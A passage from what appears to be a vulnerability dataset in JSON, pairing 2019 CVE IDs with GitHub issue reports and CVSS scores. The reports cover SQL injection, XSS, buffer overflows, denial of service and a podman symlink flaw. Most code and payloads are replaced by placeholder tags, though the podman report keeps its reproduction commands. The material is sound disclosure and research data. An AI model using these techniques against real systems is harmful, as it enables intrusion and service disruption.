        "description": "Add queue support Security Issue]. Hi, I think that having a queue for multiple conversions. If a server is doing multiple conversions, even if it all of them are with low priority, it hangs. I suggest to have a queue, allowing only one (or multiple, settings could be changed) process at the same time. The queue can be changed using the priorities, so when a high priority process is added to the queue, it should be at the top of the queue. The users should be able to see the queue status. Not other users queue, but the position on the list. For example if the queue is NUMBERTAG user1 > video1 > processing NUMBERTAG user1 > video NUMBERTAG user2 > video NUMBERTAG user3 > video NUMBERTAG user1 > video5 The user1, can see the queue as NUMBERTAG user1 > video1 > position NUMBERTAG processing NUMBERTAG user1 > video2 > position NUMBERTAG user1 > video5 > position NUMBERTAG The user2, only can see the queue as NUMBERTAG user2 > video3 > position NUMBERTAG The users should also be able to cancel the queued jobs and, potentially cancel the current process. NOTE: It is a security issue as the users can generate a APITAG because of several concurrent processes. CVSS NUMBERTAG PATHTAG URLTAG CVSS NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.7,
        "impactScore": 4.0,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2019-18217",
        "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/846",
        "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/846",
        "Repo_new": "proftpd/proftpd",
        "Issue_Created_At": "2019-10-19T19:34:47Z",
        "description": "Remote denial of service due to issue in network IO handling. Dear MENTIONTAG \u2014 As discussed, please find below the description of the APITAG NUMBERTAG denial of service issue. Issue Remote unauthenticated denial of service in APITAG NUMBERTAG triggered by a malformed network packet due to an incorrect handling of too long commands. Version APITAG NUMBERTAG PATHTAG Description An unauthenticated attacker can trigger an infinite loop by sending a malformed network packet due to an incorrect handling of too long commands. The issue in the network IO causes a child process that handles the client connection to consume NUMBERTAG CPU. If errno is NUMBERTAG E2BIG) due to a too long command and the EOF is reached, APITAG function will always return NUMBERTAG and will be called indefinitely due to the continue statement: CODETAG Impact Remote unauthenticated denial of service Cheers Stephan Zeisberg",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18409",
        "Issue_Url_old": "https://github.com/zenspider/ruby_parser-legacy/issues/1",
        "Issue_Url_new": "https://github.com/zenspider/ruby_parser-legacy/issues/1",
        "Repo_new": "zenspider/ruby_parser-legacy",
        "Issue_Created_At": "2019-10-24T12:37:36Z",
        "description": "Security Issue : invalid permission on ruby files. Hi, This gem has world writable files in the release NUMBERTAG how to reproduce the issue CODETAG exploitation poc add in PATHTAG APITAG require the gem in a other projet may run the shell code with the user privilege. CODETAG Please release a new release asap.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-18413",
        "Issue_Url_old": "https://github.com/typestack/class-validator/issues/438",
        "Issue_Url_new": "https://github.com/typestack/class-validator/issues/438",
        "Repo_new": "typestack/class-validator",
        "Issue_Created_At": "2019-10-19T19:11:50Z",
        "description": "class validator arbitrary bypass. With this vulnerability, an attacker can bypass any security checks enforced by class validator. When class validator is used to validate user input, the attributes in the user input object will be transformed into the validation class instance. However, the transforming procedure will overwrite the internal attribute of validation class instance (e.g., constructor attribute) if the attacker injects an attribute with the same name into user input. Once this internal attribute being overwritten, class validator will be bypassed. APITAG ERRORTAG Our suggestion is that class validator should check the integrity of the constructor: if it is being corrupted, the validation should automatically fail.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18413",
        "Issue_Url_old": "https://github.com/typestack/class-validator/issues/1422",
        "Issue_Url_new": "https://github.com/typestack/class-validator/issues/1422",
        "Repo_new": "typestack/class-validator",
        "Issue_Created_At": "2021-11-25T03:20:15Z",
        "description": "security: SNYK JS CLASSVALIDATOR NUMBERTAG Description APITAG URLTAG Affected versions of this package are vulnerable to Improper Input Validation via bypassing the input validation in APITAG which can lead to cross site scripting (XSS) or SQL injection. NOTE: There is an optional APITAG parameter that can be used to reduce the risk of this bypass.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18466",
        "Issue_Url_old": "https://github.com/containers/libpod/issues/3829",
        "Issue_Url_new": "https://github.com/containers/podman/issues/3829",
        "Repo_new": "containers/podman",
        "Issue_Created_At": "2019-08-15T19:51:23Z",
        "description": "podman cp dereferences symlink in host context after APITAG APITAG Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description APITAG podman cp mycontainer:/testfile /tmp/test may resolve a symlink in the host context (e.g. the file PATHTAG ) and copy it into the directory PATHTAG Steps to reproduce the issue: erik APITAG cat FILETAG container=$(buildah from scratch) mnt=$(buildah mount $container) touch \"$mnt/file \" ln s \"/file \" \"$mnt/testfile\" ln s PATHTAG APITAG buildah umount $container buildah commit $container glob1 erik APITAG rm rf /tmp/test && mkdir /tmp/test erik APITAG buildah unshare bash PATHTAG && container=$(podman create localhost/glob1 dummycmd) && podman cp $container:/testfile /tmp/test APITAG Getting image source signatures Copying blob dada6d NUMBERTAG fa NUMBERTAG done Copying config NUMBERTAG af1d7c9 done Writing manifest to image destination Storing signatures APITAG erik APITAG ls l /tmp/test total NUMBERTAG rw rw r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG file ' rw r r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG hosts erik APITAG ls l /etc/hosts rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG etc/hosts erik APITAG diff PATHTAG /etc/hosts erik APITAG Describe the results you received: erik APITAG ls l /tmp/test total NUMBERTAG rw rw r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG file ' rw r r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG hosts erik APITAG Describe the results you expected: I would not have expected to see the files PATHTAG and PATHTAG _ Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : ERRORTAG Output of APITAG : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): erik APITAG buildah version buildah version NUMBERTAG image spec NUMBERTAG runtime spec NUMBERTAG dev) erik APITAG cat /etc/issue Ubuntu NUMBERTAG LTS \\l",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-18662",
        "Issue_Url_old": "https://github.com/YouPHPTube/YouPHPTube/issues/2202",
        "Issue_Url_new": "https://github.com/wwbn/avideo/issues/2202",
        "Repo_new": "wwbn/avideo",
        "Issue_Created_At": "2019-10-31T18:26:26Z",
        "description": "SQL Injection in APITAG plugin. User input passed through the \"live_stream_code\" POST parameter to PATHTAG is not properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to e.g. read sensitive data from the database through in band SQL Injection attacks. Successful exploitation of this vulnerability requires the APITAG Chat\" plugin to be enabled. Proof of Concept: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18797",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/3000",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/3000",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2019-10-07T14:44:16Z",
        "description": "Stack Overflow in sassc. We found Stack Overflow in sassc binary and sassc is complied with clang enabling ASAN. Machine Setup APITAG Complilation : CC=afl clang fast CXX=afl clang fast++ AFL_USE_ASAN NUMBERTAG make C sassc j4 POC : FILETAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-18798",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2999",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2999",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2019-10-07T14:36:59Z",
        "description": "Heap Buffer Overflow in sassc. We found vulnerability in sassc binary and sassc is complied with clang enabling ASAN. Machine Setup CODETAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-18799",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/3001",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/3001",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2019-10-07T14:51:08Z",
        "description": "SEGV in sassc. We found Heap Buffer Overflow in sassc binary and sassc is complied with clang enabling ASAN. Machine Setup APITAG Complilation : CC=afl clang fast CXX=afl clang fast++ AFL_USE_ASAN NUMBERTAG make C sassc j4 POC : FILETAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-18815",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/22",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/22",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2019-10-19T06:27:43Z",
        "description": "Open Redirection Vulnerability. Hi, MENTIONTAG and I found open redirection vulnerability on the APITAG The vulnerable code is on FILETAG file line number NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-18816",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/21",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/21",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2019-10-18T17:21:47Z",
        "description": "Stored XSS on Post feature. Hi, MENTIONTAG and I found a stored XSS vulnerability on the Post feature. By intercepting the request, we are able to edit the request body to insert a XSS payload. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-18817",
        "Issue_Url_old": "https://github.com/istio/istio/issues/18229",
        "Issue_Url_new": "https://github.com/istio/istio/issues/18229",
        "Repo_new": "istio/istio",
        "Issue_Created_At": "2019-10-23T15:46:28Z",
        "description": "Istio Sidecar consuming high CPU Istio NUMBERTAG Bug description We are running Istio NUMBERTAG this also happend on NUMBERTAG most of our applications are running fine. However, in one of our deployments the CPU on the sidecar is pegged at NUMBERTAG for the life of the pod. This happens for the majority of the pods in the same deployment but not all. The pod contains nginx, istio proxy and an application container all of which have normal CPU use except istio proxy. I turned on debugging on the sidecar however there are not really interesting. CODETAG I was able to collect an strace from the PID of the problematic pod ERRORTAG Here is the output of kubectl n $namespace exec it $pod c istio proxy top on a pod with busy envoy ERRORTAG strace f r p NUMBERTAG ERRORTAG There has been a forum thread about it, but this is now ongoing without any resolution. So far the only workaround has been to downgrade the sidecar to NUMBERTAG URLTAG Any ideas on how I can troubleshoot further? Affected product area (please put an X in all that apply) ] Configuration Infrastructure [ ] Docs [ ] Installation [ ] Networking [x ] Performance and Scalability [ ] Policies and Telemetry [ ] Security [ ] Test and Release [ ] User Experience [ ] Developer Infrastructure Expected behavior CPU not going high Steps to reproduce the bug Unable to reproduce Version (include the output of APITAG and kubectl version ) citadel version NUMBERTAG galley version NUMBERTAG ingressgateway version NUMBERTAG pilot version NUMBERTAG policy version NUMBERTAG sidecar injector version NUMBERTAG telemetry version NUMBERTAG How was Istio installed? helm chart Environment where bug was observed (cloud vendor, OS, etc) amazon eks Additionally, please consider attaching a [cluster state archive CVETAG by attaching the dump file to this issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18840",
        "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2555",
        "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2555",
        "Repo_new": "wolfssl/wolfssl",
        "Issue_Created_At": "2019-11-04T17:01:40Z",
        "description": "Heap based buffer overflow while parsing crafted NUMBERTAG certificates. APITAG in versions NUMBERTAG and NUMBERTAG incorrectly handles NUMBERTAG certificates leading to a heap buffer overflow inside the APITAG structure, overwriting a NULL pointer and as a result crash during memory deallocation. This vulnerability affects both client and server in two supported protocols: TLS and DTLS. During processing of a crafted certificate, APITAG incorrectly handles the loc buffer in the APITAG structure. In the following line the count variable reaches value NUMBERTAG while the loc table has fixed size NUMBERTAG PATHTAG > > APITAG >loc FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18841",
        "Issue_Url_old": "https://github.com/ankane/chartkick.js/issues/117",
        "Issue_Url_new": "https://github.com/ankane/chartkick.js/issues/117",
        "Repo_new": "ankane/chartkick.js",
        "Issue_Created_At": "2019-11-10T00:11:31Z",
        "description": "Prototype Pollution in FILETAG NUMBERTAG Under certain conditions, the NUMBERTAG series of FILETAG is vulnerable to prototype pollution. This is same type of issue that was announced for APITAG URLTAG and other popular libraries earlier this year. APITAG rated this a \"minor vulnerability\" URLTAG . It's certainly unintended behavior, but since FILETAG is a client side only library, its impact is likely limited. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG to NUMBERTAG Fixed Versions NUMBERTAG ersions Unaffected NUMBERTAG Impact Passing untrusted input to APITAG and the result to FILETAG can pollute APITAG . CODETAG A specially crafted response in data loaded via URL can cause pollution well. APITAG All users running an affected release should upgrade immediately.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18844",
        "Issue_Url_old": "https://github.com/projectacrn/acrn-hypervisor/issues/3252",
        "Issue_Url_new": "https://github.com/projectacrn/acrn-hypervisor/issues/3252",
        "Repo_new": "projectacrn/acrn-hypervisor",
        "Issue_Created_At": "2019-06-12T08:24:06Z",
        "description": "Assert usages issue in device model from KW work.. Assert usages issue in device model from KW work.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18850",
        "Issue_Url_old": "https://github.com/trustedsec/trevorc2/issues/18",
        "Issue_Url_new": "https://github.com/trustedsec/trevorc2/issues/18",
        "Repo_new": "trustedsec/trevorc2",
        "Issue_Created_At": "2019-12-03T17:36:59Z",
        "description": "APITAG NUMBERTAG Fingerprinting Vulnerability. APITAG NUMBERTAG fails to prevent fingerprinting primarily via a discrepancy between response headers when responding to different HTTP methods, also via predictible unique responses when accessing and interacting with the \"SITE_PATH_QUERY\". CVETAG Gionathan Armando Reale, Deloitte DK",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18954",
        "Issue_Url_old": "https://github.com/NetEase/pomelo/issues/1149",
        "Issue_Url_new": "https://github.com/netease/pomelo/issues/1149",
        "Repo_new": "netease/pomelo",
        "Issue_Created_At": "2019-11-08T00:04:23Z",
        "description": "A vulnerability in pomelo. We found that pomelo allows external control of critical state data. A malicious user input can corrupt arbitrary methods and attributes in PATHTAG because certain internal attributes can be overwritten via a conflicting name. Hence, a malicious attacker can launch attacks by adding additional attributes to user input. A detailed discussion of the vulnerability can be found here.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-18960",
        "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/1462",
        "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/1462",
        "Repo_new": "firecracker-microvm/firecracker",
        "Issue_Created_At": "2019-12-09T22:22:37Z",
        "description": "Firecracker vsock implementation buffer overflow in versions NUMBERTAG and NUMBERTAG that can result in potentially exploitable crashes.. We have identified an issue in the Firecracker NUMBERTAG and NUMBERTAG sock implementation. Issue Description A logical error in bounds checking performed on vsock virtio descriptors can be used by a malicious guest to read from and write to a segment of the host side Firecracker process' heap address space, directly after the end of a guest memory region. For reads, the accessible segment's size is NUMBERTAG APITAG For writes, the accessible segment is limited by the host Linux kernel to a size defined in APITAG . We expect the value of APITAG to be on the order of a few hundred APITAG to a few APITAG Impact This will generally result in a segmentation fault, but remote code execution within the Firecracker host side process context cannot be ruled out. Vulnerable Systems Only Firecracker NUMBERTAG and NUMBERTAG are affected. Only Firecracker APITAG with configured vsock devices are affected, and only if one or more vsock devices are in active use by both host and guest. In a remote code execution scenario, users running Firecracker in line with the recommended Production Host Setup will see the impact limited as follows: a malicious APITAG guest that would manage to compromise the Firecracker VMM process would be restricted to running on the host as an unprivileged user, in a chroot and mount namespace isolated from the host's filesystem, in a separate pid namespace, in a separate network namespace, with system calls limited to Firecracker's seccomp whitelist, on a single NUMA node, and on a cgroups limited number of CPU cores. Mitigation Firecracker NUMBERTAG and Firecracker NUMBERTAG released on NUMBERTAG addresses this issue. The fix has also been applied to Firecracker's master branch. If you are using Firecracker NUMBERTAG or NUMBERTAG we recommend you update to NUMBERTAG or NUMBERTAG as soon as possible. If you are using Firecracker NUMBERTAG or below, you do not need to take any action. In a remote code execution scenario, users running Firecracker in line with the recommended Production Host Setup will limit the impact to the attacker's Firecracker process NUMBERTAG FILETAG NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19012",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/164",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/164",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2019-11-08T11:05:59Z",
        "description": "Integer overflow related to reg >dmax in search_in_range (regexec.c). Hello, I found an integer overflow in search_in_range at APITAG CODETAG reg >dmax is max repeat num, whose type is unsigned int. ONIG_MAX_REPEAT_NUM is NUMBERTAG but it can be multiplied into a very large number with distance_multiply at: CODETAG And Sch_range is a pointer. So if compiled in NUMBERTAG bit, sch_range += reg >dmax results into integer overflow. There should be other places related to reg >dmax/dmin which are vulnerable to integer overflow. APITAG ERRORTAG Compilation: CODETAG Output with pattern NUMBERTAG and string = x: ERRORTAG In sunday_quick_search, the APITAG gets crashed because p points to an invalid memory address. If it does not crash, p luckily points to a valid memory address. That it crashes or does not crash depends on the supplied pattern. This bug at least can be used to detect if the target system is NUMBERTAG bit or not. And if the target system is NUMBERTAG bit, is the KASLR is enable or not (constantly crashes or constantly no crashes means no KASLR). Thanks & Regards, Nguy\u1ec5n \u0110\u1ee9c M\u1ea1nh [E] v. EMAILTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19040",
        "Issue_Url_old": "https://github.com/kairosdb/kairosdb/issues/569",
        "Issue_Url_new": "https://github.com/kairosdb/kairosdb/issues/569",
        "Repo_new": "kairosdb/kairosdb",
        "Issue_Created_At": "2019-10-24T21:22:52Z",
        "description": "Reflect Cross site Scripting on error message (WEB UI / FILETAG , APITAG Hello, I want to report a Reflect Cross site scripting issue on APITAG . Vulnerability A function call on FILETAG , Line NUMBERTAG URLTAG will append error message by ERRORTAG function. ERRORTAG function was declared in FILETAG The error message will append to html without any escape. ERRORTAG So we can create a malicious error query and then trigger the XSS easily: APITAG APITAG FILETAG ) Fix You can escape the malicious code or fix with url encode APITAG before append to html. Best Regards.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19084",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5971",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5971",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-11-05T04:10:15Z",
        "description": "Placeholder Issue. Details coming soon URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19085",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5961",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5961",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-11-04T04:11:46Z",
        "description": "Placeholder Issue. Details coming soon URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-19113",
        "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/1",
        "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/1",
        "Repo_new": "newbee-ltd/newbee-mall",
        "Issue_Created_At": "2019-10-19T16:20:39Z",
        "description": "SQL Injection in APITAG . PATHTAG CODETAG Where ${keyword} is used for splicing sql statements, there is a risk of SQL injection. poc\uff1a > URLTAG We will find a sql error, which proves that the vulnerability already exists.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19203",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/163",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/163",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2019-11-06T09:39:01Z",
        "description": "heap buffer overflow in gb NUMBERTAG mbc_enc_len. In gb NUMBERTAG mbc_enc_len, p ++ then p is dereferenced without checking if it passes the end of string, which leads to heap buffer overflow. CODETAG APITAG ERRORTAG Compilation: CODETAG Output of APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19204",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/162",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/162",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2019-11-06T07:43:08Z",
        "description": "heap buffer overflow in fetch_interval_quantifier due to double PFETCH. At APITAG in fetch_interval_quantifier, PFETCH is called without checking PEND: APITAG This leads to heap buffer overflow. APITAG ERRORTAG Compilation of oniguruma and APITAG APITAG Output of APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19221",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1276",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1276",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2019-11-07T03:40:18Z",
        "description": "bsdtar: An error in APITAG (archive_string.c) allows out of bounds read memory access and subsequently cause a crash. bsdtar: An error in APITAG (archive_string.c) triggers an out of bounds read memory access that results into a crash, via a specially crafted archive file. This bug was found using our custom fuzzer. Basic Information: Version of libarchive: libarchive NUMBERTAG libarchive NUMBERTAG dev How you obtained it: build from source libarchive NUMBERTAG tar.gz ( URLTAG libarchive NUMBERTAG dev ( URLTAG Tested operating system and version: Linu NUMBERTAG generic NUMBERTAG Tested compilers versions: gcc (version NUMBERTAG and clang (version NUMBERTAG ubuntu2) What other files were involved? To trigger the bug, the crashing input file (crash_file NUMBERTAG is attached with this report. ============ Command to reproduce the bug using valgrind: $ valgrind v ./bsdtar t f crash_file NUMBERTAG Output (partial): ERRORTAG Possible cause: In APITAG (archive_string.c): CODETAG APITAG function is called with the following parameter values: wcs_length NUMBERTAG mbs_length NUMBERTAG mbs NUMBERTAG ffff6a NUMBERTAG ffe NUMBERTAG r = mbrtowc(wcs, mbs, wcs_length, &shift_state); Here, \"mbs\" has a length of NUMBERTAG byte, while, APITAG tends to read NUMBERTAG bytes (wcs_length NUMBERTAG thus resulting into memory out of bounds read. The program crashes due to memory access violation, which can cause denial of service. The values {wcs_length NUMBERTAG mbs_length NUMBERTAG are reached, if return value of APITAG is r NUMBERTAG or r NUMBERTAG in the previous iteration of the while loop. \"mbs\" pointer increases (++mbs), and \"mbs_length\" length decreases ( mbs_length), but wcs_length remains constant NUMBERTAG bytes in this case).",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19240",
        "Issue_Url_old": "https://github.com/embedthis/goahead/issues/290",
        "Issue_Url_new": "https://github.com/embedthis/goahead/issues/290",
        "Repo_new": "embedthis/goahead",
        "Issue_Created_At": "2019-11-22T02:06:21Z",
        "description": "APITAG information disclosure. Overview A security vulnerability affecting APITAG versions up to, and including NUMBERTAG has been identified. This bulletin discusses this flaw and its implications. Summary The APITAG function is vulnerable to very long host names which may cause unwanted disclosure of internal APITAG data. Discussion The APITAG web server has a vulnerability in processing redirected HTTP requests when supplied with a very large Host header. The APITAG APITAG uses a static host buffer of limited length. This can overflow with redirected requests when provided with a very long HTTP Host header. This can cause a copy of the host header to fail leaving the static host buffer uninitialized which may leak uninitialized data in the response. Threat Scope Versions up to and including NUMBERTAG Remedy Upgrade to NUMBERTAG or later. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . References APITAG Issue URLTAG CVE CVE TBD Thanks Thanks to Shuai Zhang and from Dbappsecurity.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19240",
        "Issue_Url_old": "https://github.com/embedthis/goahead/issues/289",
        "Issue_Url_new": "https://github.com/embedthis/goahead/issues/289",
        "Repo_new": "embedthis/goahead",
        "Issue_Created_At": "2019-11-22T01:59:04Z",
        "description": "APITAG disclosure with large host names. In function APITAG it doesn\u2019t check the return value of scopy in line NUMBERTAG goahead version NUMBERTAG if the length of host is more than ME_GOAHEAD_LIMIT_STRING NUMBERTAG it will fail to copy the host string and will cause hostbuf uninitialized. And then the hostbuf will be added into uri and will be printed in line NUMBERTAG It might leak the stack address, heap address and libc address in the stack. APITAG versions NUMBERTAG and NUMBERTAG up to NUMBERTAG All hardware platforms. To reproduce, provide a very long hostname in the HTTP headers. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19269",
        "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/861",
